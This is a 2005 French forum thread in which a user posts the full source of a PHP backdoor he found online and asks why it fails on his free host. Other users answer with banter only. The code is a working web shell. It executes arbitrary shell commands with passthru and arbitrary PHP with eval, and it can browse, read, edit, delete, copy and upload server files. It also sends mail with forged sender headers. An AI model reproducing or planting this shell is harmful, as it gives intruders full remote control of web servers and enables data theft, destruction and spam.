Se connecter / S'enregistrer
Votre question

Backdoor php

Tags :
  • Serveur
  • Sécurité
Dernière réponse : dans Sécurité et virus
21 Décembre 2005 22:56:40

Voila j'ai trouvé cette backdoor en php sur un site. Donc jlé foutu dans un fichier bd.php que j'ai mis sur mon serveur ifrance puis je me sauis rendu sur bd.php mais il y a eu une erreure ??? est-ce que c'est le scripte qui bug, le serveur ifrance ou autre qui bug. j'ai fait ca pour tester pas pour hacker ^^.
voici le code source

Citation :
<?
$QS = $QUERY_STRING;
if(!stristr($QS, "separateur") && $QS!="") $QS .= "&separateur";
if(!stristr($QS, "separateur") && $QS=="") $QS .= "separateur";

/*pour les forms*********************************/
$tab = explode("&", $QS);
$i=0;
$remf = "";
while( $tab[$i] != "" && $tab[$i-1] != "separateur" )
{
$temp = str_replace(strchr($tab[$i], "="), "", $tab[$i]);
eval('$temp2=${$temp};');
$remf .= "<input type=hidden name=" . $temp . " value=" . "'" . $temp2
."'>n";
$i++;
}
/*
$temp = str_replace(strchr($tab[$i], "="), "", $tab[$i]);
if($temp!="")
{
eval("$temp2=${$temp};");
$remf .= "<input type=hidden name=" . $temp . " value=" . "'" . $temp2
."'>n";
}*/
/************************************************/


/*pour les links*********************************/
if($QS != "separateur")
$reml = "?" . str_replace(strchr($QS, "&separateur"), "", $QS) .
"&separateur";
else $reml = "?$QS";
$adresse_locale = $reml;
/************************************************/




print("<hr>");
print('<a href="?option=1">Exécuter un shell</a><br> <!-- utiliser exec($commande, $retour); -->');
print('<a href="?option=2">Exécuter du code PHP</a><br>');
print('<a href="?option=3">Lister un répertoires</a><br>');
print('<a href="?option=4">Gérer les fichiers</a><br>');
print('<a href="?option=5">Envoyer un mail</a><br>');
print('<a href="?option=6">Phpinfo</a><br>');
print('<a href="?option=7">Copy</a><br>');
print('<a href="?option=8">Upload</a><br>');
print("<hr>");

$option = $_REQUEST["option"];
$rep = $_REQUEST["rep"];
$nom = $_REQUEST["nom"];
$option_file = $_REQUEST["option_file"];
$cmd = $_REQUEST["cmd"];
$code = $_REQUEST["code"];
$msg = $_REQUEST["msg"];
$option_mail = $_REQUEST["option_mail"];
$destinataire = $_REQUEST["destinataire"];
$sujet = $_REQUEST["sujet"];
$message = $_REQUEST["message"];

if($option == 1){
print('<form action="?">Commande : <input type="text" name="cmd"></form>');
echo "";
}

if($option == 2){
print('<form action="?">Code : <input type="text" name="code"></form>');
}

if($option == 3){
print('<form action="?">Répertoire à lister : <input type="text" name="rep"></form>');
print("$rep");
}

if($option == 4){
print('<form action="?">');
print('Nom du fichier :<br><input type=text name="nom">
');
print('<input type=hidden name=option value=$option>');
print('<INPUT TYPE=RADIO NAME="option_file" VALUE="mkdir" >Créer le
fichier');
print('<INPUT TYPE=RADIO NAME="option_file" VALUE="edit" >Éditer le
fichier');
print('<INPUT TYPE=RADIO NAME="option_file" VALUE="del" >Supprimer le
fichier');
print('<INPUT TYPE=RADIO NAME="option_file" VALUE="read" CHECKED>Lire le
fichier');
print("
<input type=submit value=Go>");
print("</form>");
}


if($option == 5){
print('

<form action="?">Destinataire : <input type="text" name="destinataire" size="80">');


print('<br>Provenance du mail : <input type="text" name="provenance" size="80"><br>');


print('Adresse de retour : <input type="text" name="retour" size="80"><br>');


print('Sujet : <input type="text" name="sujet" size="80"><br>');


print('Message : <input type="text" name="message"


size="80"><br><input type="submit" value="Envoyer"></form>

');
}

if($option == 6){
phpinfo();
}
if($option == 7)
{
print("
Copie de fichiers : <br/>Attention : on copie d'un fichier à un autre :
ex : c:/lol.txt à ../rep/lol2.txt<br/><form METHOD='POST'>Copier : <br>
<input type='text' name='fichier1' size='9'> <br>à l'emplacement : <br><input type='text' name='fichier2' size='90'>
<br><INPUT TYPE=SUBMIT value='GO'></form>");
echo "";
}

print('<br>Upload<FORM METHOD="POST" ENCTYPE="multipart/form-data">
<INPUT TYPE=HIDDEN NAME=MAX_FILE_SIZE
VALUE=<? echo $MFS;?>
<INPUT TYPE=FILE NAME="userfile"><BR/>destination : dossier
<INPUT TYPE="text" NAME="dossier"><BR/>
<INPUT TYPE=SUBMIT value="Upload">
</FORM>');
echo "";

/* Commande*******/
if($cmd != "")
{
echo "{${passthru($cmd)}}<br>";
}
/* Commande*******/


/* Exécution de code PHP**********/
if($code != ""){
$code = stripslashes($code);
eval($code);
}
/* Execution de code PHP**********/


/* Listing de rep******************/
if($rep != "")
{
if(strrchr($rep, "/") != "" || !stristr($rep, "/")) $rep .= "/";
$dir=opendir($rep);
while ($file = readdir($dir))
{
if (is_dir("$rep/$file") && $file!='.')
{
echo"<li><a href='$adresse_locale&rep=$rep$file'>(rep) $file
</a><br>n";
}elseif(is_file("$rep/$file"))
{
echo "<li> <a
href='$adresse_locale&option_file=read&nom=$rep$file'>(file) $file</a> <a
href='$adresse_locale&option_file=del&nom=$rep$file'>del</a> <a
href='$adresse_locale&option_file=edit&nom=$rep$file'>edit</a><br>n";
}
}
}
/* Listing de rep******************/


/* Gestion des fichiers*********************/
if($option_file == "mkdir" && $nom != "")
{
$fp = fopen($nom, "w");
fwrite($fp, stripslashes($msg));
print("Fichier crée/modifié");
}

if($option_file == "read" && $nom != "")
{

$fp = fopen($nom, "r");
$file = fread($fp, filesize($nom));
$file = htmlentities ($file, ENT_QUOTES);
$file = nl2br($file);
echo "<br>$file";
}

if($option_file == "del" && $nom != "")
{
unlink($nom);
print("Fichier effacé");
}

if($option_file == "edit" && $nom != "")
{
$fp = fopen($nom, "r");
$file = fread($fp, filesize($nom));
$file = htmlentities ($file, ENT_QUOTES);
echo "<form action=$adresse_locale>$remf";
echo "<TEXTAREA COLS=80 rows=25 name=msg>$file</textarea>";
echo "<input type=hidden name=option_file value=mkdir>";
echo "<input type=hidden name=nom value=$nom>";
echo "<br><input type=submit value=Go>Les fichiers trop long ne passe pas";
echo "</form>";
}
/* Gestion des fichiers*********************/


/* Envoi de mails************************/
if(($destinataire != "" ) && ($sujet != "") && ($message != "")){
$option_mail = "From: $provenance n";
$option_mail .= "Reply-to: $retour n";
$option_mail .= "X-Mailer: Mailer by rAidEn n";

mail($destinataire, $sujet, $message, $option_mail);

print("Mail envoyé a : $destinataire ...");
}
/* Envoi de mails************************/

/* Copier************************/
if(($_POST['fichier1'] != "" ) && ($_POST['fichier2'] != "")){
copy($_POST['fichier1'],$_POST['fichier2']);
echo 'Copie effectuée';
}
/* Copier************************/

/* Upload************************/
if(isset($_FILES['userfile'])) {
$MFS=1024000;
// Répertoire de stockage
if(isset($_POST['dossier'])) {
$rep=$_POST['dossier'];
} else {
$rep="";
}
if(isset($_FILES['userfile'])) {
if($_FILES['userfile']['size']>0) {
$savefile= $rep.$_FILES['userfile']['name'];
$temp = $_FILES['userfile']['tmp_name'];
if (move_uploaded_file($temp, $savefile)) { ?>
fichier enregistré !

Nom : <?echo $_FILES['userfile']['name'];?>

Taille : <?echo $_FILES['userfile']['size'];?> octets

Type : <?echo $_FILES['userfile']['type'];?>
<? } else { ?>
Erreur d'enregistrement !
<? }

} else { ?>
Trop gros fichier !
( <? echo $MFS;?> octets max.)
<? }
} }
/* Copier************************/
print("</body></html>");
/*print("<noscript><script="");*/
?>

Autres pages sur : backdoor php

24 Décembre 2005 00:53:59

j'ai pas ma boule de crystale mec
Contenus similaires
24 Décembre 2005 00:55:48

Salut,

Je crois qu'ifrance n'a pas de base de données, donc pas de MySQL, donc pas de ça xD
24 Décembre 2005 01:35:05

il n'y a pas de sql dans son code
24 Décembre 2005 16:35:58

Quelle réponse intelligente Okinou!! Je suis stupéfait!
25 Décembre 2005 00:27:26

ah merde, j'aurais juré en avoir vu !

Lol tant pis xD
Tom's guide dans le monde
  • Allemagne
  • Italie
  • Irlande
  • Royaume Uni
  • Etats Unis
Suivre Tom's Guide
Inscrivez-vous à la Newsletter
  • ajouter à twitter
  • ajouter à facebook
  • ajouter un flux RSS